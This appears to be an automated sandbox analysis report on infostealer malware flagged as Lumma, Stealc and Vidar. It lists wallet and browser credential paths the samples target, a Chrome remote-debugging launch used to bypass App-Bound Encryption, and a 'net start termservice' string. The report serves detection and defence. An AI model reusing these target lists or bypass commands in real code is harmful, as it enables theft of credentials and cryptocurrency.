Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: c2bea0d661.exe, 00000011.00000002.3451554221.00000000004EA000.00000040.00000001.01000000.0000000E.sdmp	String found in binary or memory: ElectrumLTC
Source: c2bea0d661.exe, 00000011.00000002.3451554221.00000000004EA000.00000040.00000001.01000000.0000000E.sdmp	String found in binary or memory: ets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: c2bea0d661.exe, 00000011.00000002.3451554221.00000000004EA000.00000040.00000001.01000000.0000000E.sdmp	String found in binary or memory: \Ethereum\
Source: c2bea0d661.exe, 00000011.00000002.3451554221.00000000004EA000.00000040.00000001.01000000.0000000E.sdmp	String found in binary or memory: ets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: c2bea0d661.exe, 00000011.00000002.3451554221.00000000004EA000.00000040.00000001.01000000.0000000E.sdmp	String found in binary or memory: Ethereum
Source: c2bea0d661.exe, 00000011.00000002.3451554221.00000000004EA000.00000040.00000001.01000000.0000000E.sdmp	String found in binary or memory: ets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: c2bea0d661.exe, 00000011.00000002.3451554221.00000000004EA000.00000040.00000001.01000000.0000000E.sdmp	String found in binary or memory: ets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: c2bea0d661.exe, 00000011.00000002.3451554221.00000000004EA000.00000040.00000001.01000000.0000000E.sdmp	String found in binary or memory: ets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: c2bea0d661.exe, 00000011.00000002.3451554221.00000000004EA000.00000040.00000001.01000000.0000000E.sdmp	String found in binary or memory: ets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: BlueMail.exe, 0000000E.00000002.2327116187.0000000005BB0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: set_UseMachineKeyStore
Source: c2bea0d661.exe, 00000011.00000002.3451554221.00000000004EA000.00000040.00000001.01000000.0000000E.sdmp	String found in binary or memory: \Electrum-LTC\wallets\

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014883001\9f2ded7baa.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe

Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\2918063365piupsah.files\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\minidumps\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\temporary\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.files\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\crashes\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.files\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014883001\9f2ded7baa.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqlite-shm
Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\default\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\to-be-removed\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014883001\9f2ded7baa.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqlite
Source: C:\Users\user\AppData\Local\Temp\1014883001\9f2ded7baa.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\archived\2023-10\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\tmp\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014883001\9f2ded7baa.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite-wal
Source: C:\Users\user\AppData\Local\Temp\1014883001\9f2ded7baa.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\db\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.files\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.files\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\sessionstore-backups\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\crashes\events\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014883001\9f2ded7baa.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\Temp\1014883001\9f2ded7baa.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\events\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\bookmarkbackups\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\y572q81e.default\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014883001\9f2ded7baa.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\3561288849sdhlie.files\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\saved-telemetry-pings\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014883001\9f2ded7baa.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal
Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\security_state\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014883001\9f2ded7baa.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite-shm
Source: C:\Users\user\AppData\Local\Temp\1014883001\9f2ded7baa.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\1014883001\9f2ded7baa.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\prefs.js
Source: C:\Users\user\AppData\Local\Temp\1014883001\9f2ded7baa.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqlite-wal
Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\archived\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\key4.db	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\AppData\Local\Temp\1014883001\9f2ded7baa.exe

File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\backups\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	File opened: C:\Users\user\AppData\Roaming\Binance\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014883001\9f2ded7baa.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\
Source: C:\Users\user\AppData\Local\Temp\1014883001\9f2ded7baa.exe	File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\

Source: Yara match	File source: 00000011.00000002.3451554221.00000000004EA000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.3451554221.00000000005B9000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: c2bea0d661.exe PID: 4876, type: MEMORYSTR

Remote Access Functionality

Attempt to bypass Chrome Application-Bound Encryption

Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe

Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"

Yara detected Credential Flusher

Source: Yara match

File source: Process Memory Space: 75e257f622.exe PID: 4248, type: MEMORYSTR

Yara detected LummaC Stealer

Source: Yara match

File source: sslproxydump.pcap, type: PCAP

Yara detected Stealc

Source: Yara match	File source: 0000002D.00000003.2522812356.0000000004D80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002D.00000002.3208807770.00000000003C1000.00000040.00000001.01000000.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 0000002D.00000002.3211612383.0000000000FCE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: Process Memory Space: c2bea0d661.exe PID: 4876, type: MEMORYSTR

Contains functionality to start a terminal service

Source: BlueMail.exe, 0000000E.00000002.2270653977.0000000003401000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: net start termservice
Source: BlueMail.exe, 0000000E.00000002.2270653977.0000000003401000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit set8bf9b3f72bb53c678e0173edf42df1aebf11e9eb444cca0553e5dc41fdf05974b44aebd5cb0b54b8fd606f4b5b11d0537fd962 3KsZed03HGoRE0s qX=IASt0e9v2nZtRVEo8qhl7O9n4Q8xhwhAKT9uOs==Rz5jczZpGT6qeI==IT0qeI==KAhwOOShEkhYRi==O4mYeP0pCnWYRS==R1dEWxixLlW7LYgf qYp8U332y5sgcRza4SaRV0u4nWo6HUh rCf8U9fZgMxYS5nWR==R1dEWxixLlW7LYgf qYp8U332y5sgcRza4SaRV0u4nWo6HUh rCf8U9fWQ9zgw9CWYOaWPSh4jCN3IQo9Gqw8UBn4QACR4WfdfWX4B==Rn0rV36iJudzzGKHJGgOFGYpHVIjR1dEWxixLlW7LYgf qYp8U332y5sgcRza4SaRV0u4nWo6HUh rCf8U9fZgMx o0s0yCoDAJaRIOt0VOd3YN=R1dEWxixLlW7LYgf qYp8U332y5sgcRza4SaRV0u4nWo6HUh rCf8U9fWQ9zgw9CWYOaVUmh3HxaJo4oWKKo9o==GW0RSNOMLl AKWsBGU==UFKuds==RFdRWs==O10S8XV4aoR4 3V494R4Vnp4VYN4 HR4aX94WH54VY349I3493h4 k5=V4Oj0u g3Hy2Q4sl GUa8yBaV4Oj0u g3Hx=V3Cndu g3Hx=WEJ=WUJ=WUN=WUR=QXKnc9==8IWYdvtrCx==8IWYdzR2Cz9=WYmjWHCqV36i 